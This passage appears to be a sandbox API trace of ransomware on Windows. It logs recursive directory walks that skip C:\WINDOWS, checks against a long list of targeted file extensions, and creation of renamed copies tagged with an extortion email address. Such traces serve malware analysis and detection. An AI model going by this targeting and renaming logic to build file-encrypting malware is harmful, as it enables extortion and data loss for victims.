hTemplateFile=0x0) returned 0x390 [0202.219] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=5712) returned 1 [0202.219] CloseHandle (hObject=0x390) returned 1 [0202.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties")) returned 0x20 [0202.220] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0202.220] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0202.220] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.220] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.220] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0202.221] GetLastError () returned 0x0 [0202.221] ReadFile (hFile=0x390, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0) Thread: id = 98 os_tid = 0x904 [0178.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4370048 [0178.096] lstrlenW (lpString="C:") returned 2 [0178.096] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x39dfcf8 | out: lpFindFileData=0x39dfcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x69a730 [0178.096] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0178.096] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0178.096] lstrlenW (lpString="$GetCurrent") returned 11 [0178.096] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0178.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4380050 [0178.097] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0178.097] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x69a7f0 [0178.097] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0178.097] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0178.097] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0178.097] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0178.097] lstrlenW (lpString="Logs") returned 4 [0178.097] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0178.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x4390058 [0178.098] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0178.098] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a170 [0178.098] FindNextFileW (in: hFindFile=0x69a170, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.099] FindNextFileW (in: hFindFile=0x69a170, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd21ec45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd21ec45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd26b034, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xa7de, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DOWNLE~1.BAT")) returned 1 [0178.099] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[idecryptyourdata@cock.li].bat") returned 80 [0178.099] lstrlenW (lpString=".1cd") returned 4 [0178.099] lstrcmpiW (lpString1=".1cd", lpString2=".bat") returned -1 [0178.099] lstrlenW (lpString=".3ds") returned 4 [0178.099] lstrcmpiW (lpString1=".3ds", lpString2=".bat") returned -1 [0178.099] lstrlenW (lpString=".3fr") returned 4 [0178.099] lstrcmpiW (lpString1=".3fr", lpString2=".bat") returned -1 [0178.099] lstrlenW (lpString=".3g2") returned 4 [0178.099] lstrcmpiW (lpString1=".3g2", lpString2=".bat") returned -1 [0178.099] lstrlenW (lpString=".3gp") returned 4 [0178.099] lstrcmpiW (lpString1=".3gp", lpString2=".bat") returned -1 [0178.099] lstrlenW (lpString=".7z") returned 3 [0178.099] lstrcmpiW (lpString1=".7z", lpString2="bat") returned -1 [0178.099] lstrlenW (lpString=".accda") returned 6 [0178.099] lstrcmpiW (lpString1=".accda", lpString2="i].bat") returned -1 [0178.099] lstrlenW (lpString=".accdb") returned 6 [0178.099] lstrcmpiW (lpString1=".accdb", lpString2="i].bat") returned -1 [0178.099] lstrlenW (lpString=".accdc") returned 6 [0178.099] lstrcmpiW (lpString1=".accdc", lpString2="i].bat") returned -1 [0178.099] lstrlenW (lpString=".accde") returned 6 [0178.099] lstrcmpiW (lpString1=".accde", lpString2="i].bat") returned -1 [0178.099] lstrlenW (lpString=".accdt") returned 6 [0178.099] lstrcmpiW (lpString1=".accdt", lpString2="i].bat") returned -1 [0178.099] lstrlenW (lpString=".accdw") returned 6 [0178.100] lstrcmpiW (lpString1=".accdw", lpString2="i].bat") returned -1 [0178.100] lstrlenW (lpString=".adb") returned 4 [0178.100] lstrcmpiW (lpString1=".adb", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".adp") returned 4 [0178.100] lstrcmpiW (lpString1=".adp", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".ai") returned 3 [0178.100] lstrcmpiW (lpString1=".ai", lpString2="bat") returned -1 [0178.100] lstrlenW (lpString=".ai3") returned 4 [0178.100] lstrcmpiW (lpString1=".ai3", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".ai4") returned 4 [0178.100] lstrcmpiW (lpString1=".ai4", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".ai5") returned 4 [0178.100] lstrcmpiW (lpString1=".ai5", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".ai6") returned 4 [0178.100] lstrcmpiW (lpString1=".ai6", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".ai7") returned 4 [0178.100] lstrcmpiW (lpString1=".ai7", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".ai8") returned 4 [0178.100] lstrcmpiW (lpString1=".ai8", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".anim") returned 5 [0178.100] lstrcmpiW (lpString1=".anim", lpString2="].bat") returned -1 [0178.100] lstrlenW (lpString=".arw") returned 4 [0178.100] lstrcmpiW (lpString1=".arw", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".as") returned 3 [0178.100] lstrcmpiW (lpString1=".as", lpString2="bat") returned -1 [0178.100] lstrlenW (lpString=".asa") returned 4 [0178.100] lstrcmpiW (lpString1=".asa", lpString2=".bat") returned -1 [0178.100] lstrlenW (lpString=".asc") returned 4 [0178.101] lstrcmpiW (lpString1=".asc", lpString2=".bat") returned -1 [0178.101] lstrlenW (lpString=".ascx") returned 5 [0178.101] lstrcmpiW (lpString1=".ascx", lpString2="].bat") returned -1 [0178.101] lstrlenW (lpString=".asm") returned 4 [0178.101] lstrcmpiW (lpString1=".asm", lpString2=".bat") returned -1 [0178.101] lstrlenW (lpString=".asmx") returned 5 [0178.101] lstrcmpiW (lpString1=".asmx", lpString2="].bat") returned -1 [0178.101] lstrlenW (lpString=".asp") returned 4 [0178.101] lstrcmpiW (lpString1=".asp", lpString2=".bat") returned -1 [0178.101] lstrlenW (lpString=".aspx") returned 5 [0178.101] lstrcmpiW (lpString1=".aspx", lpString2="].bat") returned -1 [0178.101] lstrlenW (lpString=".asr") returned 4 [0178.101] lstrcmpiW (lpString1=".asr", lpString2=".bat") returned -1 [0178.101] lstrlenW (lpString=".asx") returned 4 [0178.101] lstrcmpiW (lpString1=".asx", lpString2=".bat") returned -1 [0178.101] lstrlenW (lpString=".avi") returned 4 [0178.101] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0178.101] lstrlenW (lpString=".avs") returned 4 [0178.101] lstrcmpiW (lpString1=".avs", lpString2=".bat") returned -1 [0178.101] lstrlenW (lpString=".backup") returned 7 [0178.101] lstrcmpiW (lpString1=".backup", lpString2="li].bat") returned -1 [0178.101] lstrlenW (lpString=".bak") returned 4 [0178.101] lstrcmpiW (lpString1=".bak", lpString2=".bat") returned -1 [0178.101] lstrlenW (lpString=".bay") returned 4 [0178.101] lstrcmpiW (lpString1=".bay", lpString2=".bat") returned 1 [0178.101] lstrlenW (lpString=".bd") returned 3 [0178.101] lstrcmpiW (lpString1=".bd", lpString2="bat") returned -1 [0178.101] lstrlenW (lpString=".bin") returned 4 [0178.101] lstrcmpiW (lpString1=".bin", lpString2=".bat") returned 1 [0178.101] lstrlenW (lpString=".bmp") returned 4 [0178.101] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0178.101] lstrlenW (lpString=".bz2") returned 4 [0178.101] lstrcmpiW (lpString1=".bz2", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".c") returned 2 [0178.102] lstrcmpiW (lpString1=".c", lpString2="at") returned -1 [0178.102] lstrlenW (lpString=".cdr") returned 4 [0178.102] lstrcmpiW (lpString1=".cdr", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".cer") returned 4 [0178.102] lstrcmpiW (lpString1=".cer", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".cf") returned 3 [0178.102] lstrcmpiW (lpString1=".cf", lpString2="bat") returned -1 [0178.102] lstrlenW (lpString=".cfc") returned 4 [0178.102] lstrcmpiW (lpString1=".cfc", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".cfm") returned 4 [0178.102] lstrcmpiW (lpString1=".cfm", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".cfml") returned 5 [0178.102] lstrcmpiW (lpString1=".cfml", lpString2="].bat") returned -1 [0178.102] lstrlenW (lpString=".cfu") returned 4 [0178.102] lstrcmpiW (lpString1=".cfu", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".chm") returned 4 [0178.102] lstrcmpiW (lpString1=".chm", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".cin") returned 4 [0178.102] lstrcmpiW (lpString1=".cin", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".class") returned 6 [0178.102] lstrcmpiW (lpString1=".class", lpString2="i].bat") returned -1 [0178.102] lstrlenW (lpString=".clx") returned 4 [0178.102] lstrcmpiW (lpString1=".clx", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".config") returned 7 [0178.102] lstrcmpiW (lpString1=".config", lpString2="li].bat") returned -1 [0178.102] lstrlenW (lpString=".cpp") returned 4 [0178.102] lstrcmpiW (lpString1=".cpp", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".cr2") returned 4 [0178.102] lstrcmpiW (lpString1=".cr2", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".crt") returned 4 [0178.102] lstrcmpiW (lpString1=".crt", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".crw") returned 4 [0178.102] lstrcmpiW (lpString1=".crw", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".cs") returned 3 [0178.102] lstrcmpiW (lpString1=".cs", lpString2="bat") returned -1 [0178.102] lstrlenW (lpString=".css") returned 4 [0178.102] lstrcmpiW (lpString1=".css", lpString2=".bat") returned 1 [0178.102] lstrlenW (lpString=".csv") returned 4 [0178.103] lstrcmpiW (lpString1=".csv", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".cub") returned 4 [0178.103] lstrcmpiW (lpString1=".cub", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".dae") returned 4 [0178.103] lstrcmpiW (lpString1=".dae", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".dat") returned 4 [0178.103] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".db") returned 3 [0178.103] lstrcmpiW (lpString1=".db", lpString2="bat") returned -1 [0178.103] lstrlenW (lpString=".dbf") returned 4 [0178.103] lstrcmpiW (lpString1=".dbf", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".dbx") returned 4 [0178.103] lstrcmpiW (lpString1=".dbx", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".dc3") returned 4 [0178.103] lstrcmpiW (lpString1=".dc3", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".dcm") returned 4 [0178.103] lstrcmpiW (lpString1=".dcm", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".dcr") returned 4 [0178.103] lstrcmpiW (lpString1=".dcr", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".der") returned 4 [0178.103] lstrcmpiW (lpString1=".der", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".dib") returned 4 [0178.103] lstrcmpiW (lpString1=".dib", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".dic") returned 4 [0178.103] lstrcmpiW (lpString1=".dic", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".dif") returned 4 [0178.103] lstrcmpiW (lpString1=".dif", lpString2=".bat") returned 1 [0178.103] lstrlenW (lpString=".divx") returned 5 [0178.103] lstrcmpiW (lpString1=".divx", lpString2="].bat") returned -1 [0178.104] lstrlenW (lpString=".djvu") returned 5 [0178.104] lstrcmpiW (lpString1=".djvu", lpString2="].bat") returned -1 [0178.104] lstrlenW (lpString=".dng") returned 4 [0178.104] lstrcmpiW (lpString1=".dng", lpString2=".bat") returned 1 [0178.104] lstrlenW (lpString=".doc") returned 4 [0178.104] lstrcmpiW (lpString1=".doc", lpString2=".bat") returned 1 [0178.104] lstrlenW (lpString=".docm") returned 5 [0178.104] lstrcmpiW (lpString1=".docm", lpString2="].bat") returned -1 [0178.104] lstrlenW (lpString=".docx") returned 5 [0178.104] lstrcmpiW (lpString1=".docx", lpString2="].bat") returned -1 [0178.104] lstrlenW (lpString=".dot") returned 4 [0178.104] lstrcmpiW (lpString1=".dot", lpString2=".bat") returned 1 [0178.104] lstrlenW (lpString=".dotm") returned 5 [0178.104] lstrcmpiW (lpString1=".dotm", lpString2="].bat") returned -1 [0178.104] lstrlenW (lpString=".dotx") returned 5 [0178.104] lstrcmpiW (lpString1=".dotx", lpString2="].bat") returned -1 [0178.104] lstrlenW (lpString=".dpx") returned 4 [0178.104] lstrcmpiW (lpString1=".dpx", lpString2=".bat") returned 1 [0178.104] lstrlenW (lpString=".dqy") returned 4 [0178.104] lstrcmpiW (lpString1=".dqy", lpString2=".bat") returned 1 [0178.104] lstrlenW (lpString=".dsn") returned 4 [0178.104] lstrcmpiW (lpString1=".dsn", lpString2=".bat") returned 1 [0178.104] lstrlenW (lpString=".dt") returned 3 [0178.104] lstrcmpiW (lpString1=".dt", lpString2="bat") returned -1 [0178.104] lstrlenW (lpString=".dtd") returned 4 [0178.104] lstrcmpiW (lpString1=".dtd", lpString2=".bat") returned 1 [0178.104] lstrlenW (lpString=".dwg") returned 4 [0178.104] lstrcmpiW (lpString1=".dwg", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".dwt") returned 4 [0178.105] lstrcmpiW (lpString1=".dwt", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".dx") returned 3 [0178.105] lstrcmpiW (lpString1=".dx", lpString2="bat") returned -1 [0178.105] lstrlenW (lpString=".dxf") returned 4 [0178.105] lstrcmpiW (lpString1=".dxf", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".edml") returned 5 [0178.105] lstrcmpiW (lpString1=".edml", lpString2="].bat") returned -1 [0178.105] lstrlenW (lpString=".efd") returned 4 [0178.105] lstrcmpiW (lpString1=".efd", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".elf") returned 4 [0178.105] lstrcmpiW (lpString1=".elf", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".emf") returned 4 [0178.105] lstrcmpiW (lpString1=".emf", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".emz") returned 4 [0178.105] lstrcmpiW (lpString1=".emz", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".epf") returned 4 [0178.105] lstrcmpiW (lpString1=".epf", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".eps") returned 4 [0178.105] lstrcmpiW (lpString1=".eps", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".epsf") returned 5 [0178.105] lstrcmpiW (lpString1=".epsf", lpString2="].bat") returned -1 [0178.105] lstrlenW (lpString=".epsp") returned 5 [0178.105] lstrcmpiW (lpString1=".epsp", lpString2="].bat") returned -1 [0178.105] lstrlenW (lpString=".erf") returned 4 [0178.105] lstrcmpiW (lpString1=".erf", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".exr") returned 4 [0178.105] lstrcmpiW (lpString1=".exr", lpString2=".bat") returned 1 [0178.105] lstrlenW (lpString=".f4v") returned 4 [0178.106] lstrcmpiW (lpString1=".f4v", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".fido") returned 5 [0178.106] lstrcmpiW (lpString1=".fido", lpString2="].bat") returned -1 [0178.106] lstrlenW (lpString=".flm") returned 4 [0178.106] lstrcmpiW (lpString1=".flm", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".flv") returned 4 [0178.106] lstrcmpiW (lpString1=".flv", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".frm") returned 4 [0178.106] lstrcmpiW (lpString1=".frm", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".fxg") returned 4 [0178.106] lstrcmpiW (lpString1=".fxg", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".geo") returned 4 [0178.106] lstrcmpiW (lpString1=".geo", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".gif") returned 4 [0178.106] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".grs") returned 4 [0178.106] lstrcmpiW (lpString1=".grs", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".gz") returned 3 [0178.106] lstrcmpiW (lpString1=".gz", lpString2="bat") returned -1 [0178.106] lstrlenW (lpString=".h") returned 2 [0178.106] lstrcmpiW (lpString1=".h", lpString2="at") returned -1 [0178.106] lstrlenW (lpString=".hdr") returned 4 [0178.106] lstrcmpiW (lpString1=".hdr", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".hpp") returned 4 [0178.106] lstrcmpiW (lpString1=".hpp", lpString2=".bat") returned 1 [0178.106] lstrlenW (lpString=".hta") returned 4 [0178.106] lstrcmpiW (lpString1=".hta", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".htc") returned 4 [0178.107] lstrcmpiW (lpString1=".htc", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".htm") returned 4 [0178.107] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".html") returned 5 [0178.107] lstrcmpiW (lpString1=".html", lpString2="].bat") returned -1 [0178.107] lstrlenW (lpString=".icb") returned 4 [0178.107] lstrcmpiW (lpString1=".icb", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".ics") returned 4 [0178.107] lstrcmpiW (lpString1=".ics", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".iff") returned 4 [0178.107] lstrcmpiW (lpString1=".iff", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".inc") returned 4 [0178.107] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".indd") returned 5 [0178.107] lstrcmpiW (lpString1=".indd", lpString2="].bat") returned -1 [0178.107] lstrlenW (lpString=".ini") returned 4 [0178.107] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".iqy") returned 4 [0178.107] lstrcmpiW (lpString1=".iqy", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".j2c") returned 4 [0178.107] lstrcmpiW (lpString1=".j2c", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".j2k") returned 4 [0178.107] lstrcmpiW (lpString1=".j2k", lpString2=".bat") returned 1 [0178.107] lstrlenW (lpString=".java") returned 5 [0178.107] lstrcmpiW (lpString1=".java", lpString2="].bat") returned -1 [0178.107] lstrlenW (lpString=".jp2") returned 4 [0178.107] lstrcmpiW (lpString1=".jp2", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".jpc") returned 4 [0178.108] lstrcmpiW (lpString1=".jpc", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".jpe") returned 4 [0178.108] lstrcmpiW (lpString1=".jpe", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".jpeg") returned 5 [0178.108] lstrcmpiW (lpString1=".jpeg", lpString2="].bat") returned -1 [0178.108] lstrlenW (lpString=".jpf") returned 4 [0178.108] lstrcmpiW (lpString1=".jpf", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".jpg") returned 4 [0178.108] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".jpx") returned 4 [0178.108] lstrcmpiW (lpString1=".jpx", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".js") returned 3 [0178.108] lstrcmpiW (lpString1=".js", lpString2="bat") returned -1 [0178.108] lstrlenW (lpString=".jsf") returned 4 [0178.108] lstrcmpiW (lpString1=".jsf", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".json") returned 5 [0178.108] lstrcmpiW (lpString1=".json", lpString2="].bat") returned -1 [0178.108] lstrlenW (lpString=".jsp") returned 4 [0178.108] lstrcmpiW (lpString1=".jsp", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".kdc") returned 4 [0178.108] lstrcmpiW (lpString1=".kdc", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".kmz") returned 4 [0178.108] lstrcmpiW (lpString1=".kmz", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".kwm") returned 4 [0178.108] lstrcmpiW (lpString1=".kwm", lpString2=".bat") returned 1 [0178.108] lstrlenW (lpString=".lasso") returned 6 [0178.109] lstrcmpiW (lpString1=".lasso", lpString2="i].bat") returned -1 [0178.109] lstrlenW (lpString=".lbi") returned 4 [0178.109] lstrcmpiW (lpString1=".lbi", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".lgf") returned 4 [0178.109] lstrcmpiW (lpString1=".lgf", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".lgp") returned 4 [0178.109] lstrcmpiW (lpString1=".lgp", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".log") returned 4 [0178.109] lstrcmpiW (lpString1=".log", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".m1v") returned 4 [0178.109] lstrcmpiW (lpString1=".m1v", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".m4a") returned 4 [0178.109] lstrcmpiW (lpString1=".m4a", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".m4v") returned 4 [0178.109] lstrcmpiW (lpString1=".m4v", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".max") returned 4 [0178.109] lstrcmpiW (lpString1=".max", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".md") returned 3 [0178.109] lstrcmpiW (lpString1=".md", lpString2="bat") returned -1 [0178.109] lstrlenW (lpString=".mda") returned 4 [0178.109] lstrcmpiW (lpString1=".mda", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".mdb") returned 4 [0178.109] lstrcmpiW (lpString1=".mdb", lpString2=".bat") returned 1 [0178.109] lstrlenW (lpString=".mde") returned 4 [0178.110] lstrcmpiW (lpString1=".mde", lpString2=".bat") returned 1 [0178.110] lstrlenW (lpString=".mdf") returned 4 [0178.110] lstrcmpiW (lpString1=".mdf", lpString2=".bat") returned 1 [0178.110] lstrlenW (lpString=".mdw") returned 4 [0178.110] lstrcmpiW (lpString1=".mdw", lpString2=".bat") returned 1 [0178.110] lstrlenW (lpString=".mef") returned 4 [0178.110] lstrcmpiW (lpString1=".mef", lpString2=".bat") returned 1 [0178.110] lstrlenW (lpString=".mft") returned 4 [0178.110] lstrcmpiW (lpString1=".mft", lpString2=".bat") returned 1 [0178.110] lstrlenW (lpString=".mfw") returned 4 [0178.110] lstrcmpiW (lpString1=".mfw", lpString2=".bat") returned 1 [0178.110] lstrlenW (lpString=".mht") returned 4 [0178.110] lstrcmpiW (lpString1=".mht", lpString2=".bat") returned 1 [0178.110] lstrlenW (lpString=".mhtml") returned 6 [0178.110] lstrcmpiW (lpString1=".mhtml", lpString2="i].bat") returned -1 [0178.110] lstrlenW (lpString=".mka") returned 4 [0178.110] lstrcmpiW (lpString1=".mka", lpString2=".bat") returned 1 [0178.110] lstrlenW (lpString=".mkidx") returned 6 [0178.110] lstrcmpiW (lpString1=".mkidx", lpString2="i].bat") returned -1 [0178.110] lstrlenW (lpString=".mkv") returned 4 [0178.110] lstrcmpiW (lpString1=".mkv", lpString2=".bat") returned 1 [0178.110] lstrlenW (lpString=".mos") returned 